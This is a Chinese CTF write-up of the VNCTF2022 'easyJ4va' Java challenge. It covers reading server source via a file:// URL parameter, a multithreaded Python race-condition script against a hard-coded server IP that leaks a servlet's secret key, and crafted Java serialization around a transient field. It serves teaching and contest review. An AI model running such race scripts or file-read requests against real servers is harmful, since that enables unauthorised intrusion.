从CTF题了解Servlet的线程安全问题

前言

VNCTF2022_easyJ4va 源于前几天打的VNCTF,这题自己尝试做了一下午,感觉确实可以,就拿来复盘一下,比赛做一下午没做出来,这里直接拿他读出来的源码进行复现吧,如果有想学习的师傅可以加我公告里的qq来拿源码试着做一下

正文

涉及知识点

个人感觉其中获取key的过程涉及到Servlet的线程安全问题,这里具体可以看一下Y4师傅的文章,给出文章地址 Servlet的线程安全问题,获取flag的过程涉及到java-Transient关键字的问题,这里给出文章地址 java-Transient关键字、Volatile关键字介绍和序列化、反序列化机制、单例类序列化

然后接下来具体看题吧

复现过程

打开环境,提示我们/file?,可以想到这里应该是让我们在/file路径下get传入一个参数,访问/file提示输入url,大概就是让我们访问/file?url=xxxx,这里有经验的师傅就大概可以猜到存在类似于SSRF或者读文件漏洞,这里直接上了file协议,读取出他的源码。这就一步带过了,因为太简单了。

image-20220411173846821

读出来源代码以后我们直接进行审计,这就是一个Servlet对象,具体来看一下

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package servlet;

import entity.User;
import java.io.IOException;
import java.util.Base64;
import java.util.Base64.Decoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import util.Secr3t;
import util.SerAndDe;

@WebServlet(
    name = "HelloServlet",
    urlPatterns = {"/evi1"}
)
public class HelloWorldServlet extends HttpServlet {
    private volatile String name = "m4n_q1u_666";
    private volatile String age = "666";
    private volatile String height = "180";
    User user;

    public HelloWorldServlet() {
    }

    public void init() throws ServletException {
        this.user = new User(this.name, this.age, this.height);
    }

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String reqName = req.getParameter("name");
        if (reqName != null) {
            this.name = reqName;
        }

        if (Secr3t.check(this.name)) {
            this.Response(resp, "no vnctf2022!");
        } else {
            if (Secr3t.check(this.name)) {
                this.Response(resp, "The Key is " + Secr3t.getKey());
            }

        }
    }

    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String key = req.getParameter("key");
        String text = req.getParameter("base64");
        if (Secr3t.getKey().equals(key) && text != null) {
            Decoder decoder = Base64.getDecoder();
            byte[] textByte = decoder.decode(text);
            User u = (User)SerAndDe.deserialize(textByte);
            if (this.user.equals(u)) {
                this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
            }
        } else {
            this.Response(resp, "KeyError");
        }

    }

    private void Response(HttpServletResponse resp, String outStr) throws IOException {
        ServletOutputStream out = resp.getOutputStream();
        out.write(outStr.getBytes());
        out.flush();
        out.close();
    }
}

首先我们需要关注的是如何获取到Flag,因此我们可以看到在doPost()方法里面有这么一段代码

            if (this.user.equals(u)) {
                this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
            }

要想要得到flag,必须要user和u相等,继续往上看,u是经过SerAndDe.deserialize(textByte);以后进行强制类型转换的结果,然后继续往上,可以看到一个if判断,需要拿到flag必须要先进入判断,必须要让如下代码结果为true

Secr3t.getKey().equals(key) && text != null

text是接收的一个base64参数,因此我们要让Secr3t.getKey()=key,下面给出Secr3t的源码,阅读了Secr3t的源码可以知道,我们需要先获取到一个key,key是要在HelloWorldServlet里的doGet()方法进行获取

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package util;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import org.apache.commons.lang3.RandomStringUtils;

public class Secr3t {
    private static final String Key = RandomStringUtils.randomAlphanumeric(32);
    private static StringBuffer Flag;

    private Secr3t() {
    }

    public static String getKey() {
        return Key;
    }

    public static StringBuffer getFlag() {
        Flag = new StringBuffer();
        InputStream in = null;

        try {
            in = Runtime.getRuntime().exec("/readflag").getInputStream();
        } catch (IOException var12) {
            var12.printStackTrace();
        }

        BufferedReader read = new BufferedReader(new InputStreamReader(in));

        try {
            String line = null;

            while((line = read.readLine()) != null) {
                Flag.append(line + "\n");
            }
        } catch (IOException var13) {
            var13.printStackTrace();
        } finally {
            try {
                in.close();
                read.close();
            } catch (IOException var11) {
                var11.printStackTrace();
                System.out.println("Secr3t : io exception!");
            }

        }

        return Flag;
    }

    public static boolean check(String checkStr) {
        return "vnctf2022".equals(checkStr);
    }
}

获取key的主要代码如下:

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String reqName = req.getParameter("name");
        if (reqName != null) {
            this.name = reqName;
        }

        if (Secr3t.check(this.name)) {
            this.Response(resp, "no vnctf2022!");
        } else {
            if (Secr3t.check(this.name)) {
                this.Response(resp, "The Key is " + Secr3t.getKey());
            }

        }
    }

这里需要传入一个name参数,但是这里比较奇怪,又要让你Secr3t.check(this.name)结果为false,又要在else里的Secr3t.check(this.name)结果为true,这就有意思了,正常来说确实不可能,但是看了Y4师傅的那篇文章后可以知道多个客户端一起访问时,得到的是同一个Servlet,这就会造成别人对实例变量的修改会影响另外一个客户端。所以这里要拿到key,只需要用多线程来写,让他在一个线程为真的时候,另外一个线程为假,给出python脚本

import io
import requests
import threading

url = 'http://1.13.163.248:8081/evi1?name='


def white(session):
    while event.isSet():
        res = session.get(url=url+"vnctf2022").text
        if 'Key' in res:
            print(res)
            event.clear()


def black(session):
    while event.isSet():
        res = session.get(url=url + "vnctf2021").text
        if 'Key' in res:
            print(res)
            event.clear()


if __name__ == '__main__':
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=white, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=black, args=(session,)).start()

这里的话我当时跑出来的key是lDZHZ96itWAnjtaq9Xnqj2sfcn2SRqF1,图忘记保存了,这里拿到了key,接下来直接拿flag即可,获取flag的方法刚刚已经放出来了,就有个user可能不知道,user是类里面的一个User类的属性,User类如下

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class User implements Serializable {
    private String name;
    private String age;
    private transient String height;

    public User(String name, String age, String height) {
        this.name = name;
        this.age = age;
        this.height = height;
    }

    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getAge() {
        return this.age;
    }

    public void setAge(String age) {
        this.age = age;
    }

    public String getHeight() {
        return this.height;
    }

    public void setHeight(String height) {
        this.height = height;
    }

    private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
        s.defaultReadObject();
        this.height = (String)s.readObject();
    }

    public boolean equals(Object obj) {
        if (obj == null) {
            return false;
        } else if (this == obj) {
            return true;
        } else if (obj instanceof User) {
            User user = (User)obj;
            return user.getAge().equals(this.age) && user.getHeight().equals(this.height) && user.getName().equals(this.name);
        } else {
            return false;
        }
    }

    public String toString() {
        return "User{name='" + this.name + '\'' + ", age='" + this.age + '\'' + ", height='" + this.height + '\'' + '}';
    }
}

user会有初始值,我们需要让u=user,需要搞清楚u是怎么来的,再放一遍代码,是通过我们传入的base64的参数进行base64解码然后经过SerAndDe.deserialize方法之后强制转换成User类,这里的话我们大概可以知道这是个反序列化的函数,需要拿到他原始的值只需要序列化即可,这里题目自带了序列化的函数,我们只需要调用即可

        if (Secr3t.getKey().equals(key) && text != null) {
            Decoder decoder = Base64.getDecoder();
            byte[] textByte = decoder.decode(text);
            User u = (User)SerAndDe.deserialize(textByte);

给出SerAndDe的代码,其实这里影响不大,具体往下看

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package util;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class SerAndDe {
    private SerAndDe() {
    }

    public static byte[] serialize(Object object) {
        ObjectOutputStream oos = null;
        ByteArrayOutputStream bos = null;

        Object var4;
        try {
            bos = new ByteArrayOutputStream();
            oos = new ObjectOutputStream(bos);
            oos.writeObject(object);
            byte[] b = bos.toByteArray();
            byte[] var16 = b;
            return var16;
        } catch (IOException var14) {
            System.out.println("serialize Exception:" + var14.toString());
            var4 = null;
        } finally {
            try {
                if (oos != null) {
                    oos.close();
                }

                if (bos != null) {
                    bos.close();
                }
            } catch (IOException var13) {
                System.out.println("io could not close:" + var13.toString());
            }

        }

        return (byte[])var4;
    }

    public static Object deserialize(byte[] bytes) {
        ByteArrayInputStream bais = null;

        Object var3;
        try {
            bais = new ByteArrayInputStream(bytes);
            ObjectInputStream ois = new ObjectInputStream(bais);
            var3 = ois.readObject();
            return var3;
        } catch (IOException | ClassNotFoundException var13) {
            System.out.println("deserialize Exception:" + var13.toString());
            var3 = null;
        } finally {
            try {
                if (bais != null) {
                    bais.close();
                }
            } catch (IOException var12) {
                System.out.println("LogManage Could not serialize:" + var12.toString());
            }

        }

        return var3;
    }
}

我开始的时候是直接调用序列化方法,然后base64编码,但是确实没用,后面还是别的师傅和我说,有一个属性不可序列化,其中这个height加入了transient关键字,使他不能进行序列化,这里我们就直接看我上面放出的那篇文章吧,具体方法就是重写一个writeObject方法,手动重新赋值一个可序列化的属性给对象

image-20220411173900975

手动在User类下面添加添加如下方法

private void writeObject(ObjectOutputStream s) throws IOException{
    s.defaultWriteObject();
    s.writeObject("180");
}

然后随便写个测试类,然后直接输出base64的结果,这里可以自己把环境运行起来

package VNCTF2022;
import entity.User;
import util.SerAndDe;
import java.util.Base64;
public class Test {
    public static void main(String[] args) {
        Base64.Decoder decoder = Base64.getDecoder();
        User user = new User("m4n_q1u_666","666","180");
        byte[] X= SerAndDe.serialize(user);
        String text=Base64.getEncoder().encodeToString(X);
        byte[] textByte=decoder.decode(text);
        String Y = textByte.toString();
        System.out.println(text);//base64

        System.out.println("textByte: "+textByte);//解base之后的 序列化结果
        String out = SerAndDe.deserialize(textByte).toString();//反序列化结果
        System.out.println("反序列化得到的结果为: "+out);
    }
}
image-20220411173910411

即可得到我们所需要的结果,然后post传入即可,这里因为是自己搭建的环境,所以不能执行/readflag,这里只需要弹个计算器即可

image-20220411173905852